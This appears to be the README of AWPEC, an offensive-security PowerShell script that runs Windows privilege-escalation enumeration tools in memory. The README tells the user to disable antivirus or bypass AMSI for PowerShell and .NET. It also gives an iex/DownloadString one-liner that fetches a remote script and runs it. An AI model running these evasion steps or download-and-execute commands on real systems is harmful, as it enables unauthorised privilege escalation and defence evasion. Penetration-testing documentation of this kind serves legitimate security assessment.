PowerShell script that automates the tedious tasks of Windows Privilege Escalation
AWPEC runs the following privilege escalation tools in memory:
- PowerUp
- Seatbelt
- PrivescCheck
- WinPEAS
It also supports running ADRecon and auditing the results if you find yourself within an Active Directory domain context.
Since the AWPEC PowerShell script relies on various 3rd party tools, which are known for being flagged by AV, we have to either disable antivirus or actively bypass AMSI. Furthermore, as we utilize PowerSharpPack, which reflectively loads C# code, we must ensure to bypass AMSI .NET as well. A basic AMSI PS bypass is not sufficient!
So open a low-priv PowerShell terminal session, bypass AMSI (PS + .NET) and then run the PS script:
# run the AWPEC script
iex(new-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Haxxnet/AWPEC/main/Invoke-AWPEC.ps1')Many thanks to the following individuals: